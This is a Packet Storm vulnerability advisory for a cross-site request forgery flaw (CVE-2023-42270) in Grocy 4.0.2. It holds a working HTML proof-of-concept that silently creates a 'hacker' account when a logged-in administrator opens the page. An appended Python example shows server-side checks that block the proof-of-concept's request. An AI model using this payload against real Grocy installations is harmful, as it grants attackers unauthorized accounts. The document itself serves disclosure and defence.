packetstorm | Chance Proctor | PACKETSTORM:176958
History: Feb 02, 2024 - 12:00 a.m.

Grocy 4.0.2 Cross Site Request Forgery

packetstormsecurity.com

AI Score: 7.4 (Confidence: Low) | EPSS: 0.001 (Percentile: 31.8%)

`# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability  
# Application: Grocy  
# Version: <= 4.0.2  
# Date: 09/21/2023  
# Exploit Author: Chance Proctor  
# Vendor Homepage: https://grocy.info/  
# Software Link: https://github.com/grocy/grocy  
# Tested on: Linux  
# CVE : CVE-2023-42270  
  
  
  
Overview  
==================================================  
When a new user is created in Grocy 4.0.2, the request is sent in JSON format.  
Because this is a well-known format, the request is easy to modify.  
There is also no CSRF token or other mechanism in place to verify where the request is coming from.  
This allows HTML code to create a new user as long as the target is logged in and has Create User Permissions.  
  
  
  
Proof of Concept  
==================================================  
Host the following HTML code via an XSS or deliver it via a phishing campaign:  
  
<html>  
<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">  
<input name='username' value='hacker' type='hidden'>  
<input name='password' value='test' type='hidden'>  
<input type=submit>  
</form>  
<script>  
history.pushState('','', '/');  
document.forms[0].submit();  
</script>  
</html>  
  
  
If a user is logged into the Grocy web app at the time of execution, a new user will be created in the app with the following credentials:  
  
Username: hacker  
Password: test  
  
Note:  
In order for this to work, the target must have Create User Permissions.  
This is enabled by default.  
  
  
  
Proof of Exploit/Reproduce  
==================================================  
http://xploit.sh/posts/cve-2023-42270/  
  
`
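The missing verification described in the Overview, sketched as a server-side check that would reject the proof-of-concept form post. This is an added example, not code from the advisory or from Grocy; the function names, the `https://grocy.example` origin and the sample requests are constructed for illustration, and the check complements rather than replaces a per-session CSRF token.

```python
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
TRUSTED_ORIGIN = "https://grocy.example"  # constructed placeholder for the app's own origin

def origin_of(url):
    """Reduce an Origin or Referer value to scheme://host[:port]; None if unparsable."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None  # also covers the literal "null" origin of sandboxed documents
    return f"{parts.scheme}://{parts.netloc}".lower()

def check_request(method, headers, trusted_origin=TRUSTED_ORIGIN):
    """Return (allowed, reason) for a cookie-authenticated API request."""
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    # 1. Fetch metadata: modern browsers label cross-site requests themselves.
    site = h.get("sec-fetch-site")
    if site is not None and site not in ("same-origin", "none"):
        return False, "cross-site fetch metadata"
    # 2. Origin (falling back to Referer) must be the application's own origin.
    source = h.get("origin") or h.get("referer")
    if source is not None and origin_of(source) != trusted_origin:
        return False, "origin mismatch"
    # 3. An HTML form can only send urlencoded, multipart or text/plain bodies,
    #    so insisting on JSON rejects the enctype used in the proof of concept.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "not application/json"
    return True, "ok"

# Constructed sample requests (headers only), not captured traffic.
FORM = "application/x-www-form-urlencoded"
SAMPLES = {
    "poc_form_post": ("POST", {"Origin": "https://attacker.example",
                               "Sec-Fetch-Site": "cross-site", "Content-Type": FORM}),
    "poc_old_browser": ("POST", {"Origin": "https://attacker.example",
                                 "Content-Type": FORM}),
    "poc_no_headers": ("POST", {"Content-Type": FORM}),
    "legit_json": ("POST", {"Origin": "https://grocy.example",
                            "Sec-Fetch-Site": "same-origin",
                            "Content-Type": "application/json; charset=utf-8"}),
}

if __name__ == "__main__":
    for name, (method, hdrs) in SAMPLES.items():
        print(f"{name:16} -> {check_request(method, hdrs)}")
```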
